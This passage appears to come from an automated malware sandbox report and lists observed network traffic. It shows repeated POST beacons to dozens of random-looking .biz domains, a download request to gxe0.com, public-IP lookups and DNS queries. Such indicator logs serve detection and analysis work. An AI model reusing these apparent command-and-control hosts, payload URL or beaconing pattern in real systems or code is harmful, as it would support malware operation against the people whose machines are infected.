                      Source: global trafficHTTP traffic detected: POST /f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /un HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /clwkdjrpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /pp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xvxvb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /fmoeeajmwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dafvnimy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /wmgifckgalul HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /jbeahxhrrox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qsiowupusbdmuycw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /bxb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /dhvlfe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /mbwfuvniwrfvtay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /kmhehllcncpcmx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ufrkmoty HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /guccjkgttakjk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /bfkrntj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bhgqjlporijt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ujdfhlt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /trv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /jferkddaawh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bapjyruoaxktnus HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /lxhiearhlrgyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /vxcf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /gglasl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /cegoaqgwn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /immm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /olpviqdes HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /wnrmxkw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /fgvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /kmawesuis HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /omussovltlslijvl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /jieanryejufrqdp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /uiyvk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /bcv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /yjjloqhj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /oxeso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tettt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /fy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /einfvlafepro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ildoflkoi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /pjihilgkvncwcevm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /oaf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: gxe0.com
                      Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                      Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                      Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                      Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                      Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                      Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                      Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                      Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                      Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                      Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                      Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                      Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                      Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                      Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                      Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                      Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                      Source: global trafficDNS traffic detected: DNS query: deoci.biz
                      Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                      Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                      Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                      Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                      Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                      Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                      Source: global trafficDNS traffic detected: DNS query: myups.biz
                      Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                      Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                      Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                      Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                      Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                      Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
                      Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                      Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                      Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                      Source: global trafficDNS traffic detected: DNS query: vyome.biz
                      Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                      Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                      Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                      Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                      Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                      Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                      Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                      Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                      Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                      Source: global trafficDNS traffic detected: DNS query: brsua.biz
                      Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
                      Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
                      Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
                      Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
                      Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
                      Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
                      Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
                      Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
                      Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
                      Source: global trafficDNS traffic detected: DNS query: gcedd.biz
                      Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
                      Source: global trafficDNS traffic detected: DNS query: xccjj.biz
                      Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
                      Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
                      Source: global trafficDNS traffic detected: DNS query: uaafd.biz
                      Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
                      Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
                      Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
                      Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
                      Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
                      Source: global trafficDNS traffic detected: DNS query: whjovd.biz
                      Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
                      Source: global trafficDNS traffic detected: DNS query: reczwga.biz
                      Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
                      Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
                      Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
                      Source: global trafficDNS traffic detected: DNS query: ywffr.biz
                      Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
                      Source: global trafficDNS traffic detected: DNS query: pectx.biz
                      Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
                      Source: global trafficDNS traffic detected: DNS query: banwyw.biz
                      Source: global trafficDNS traffic detected: DNS query: muapr.biz
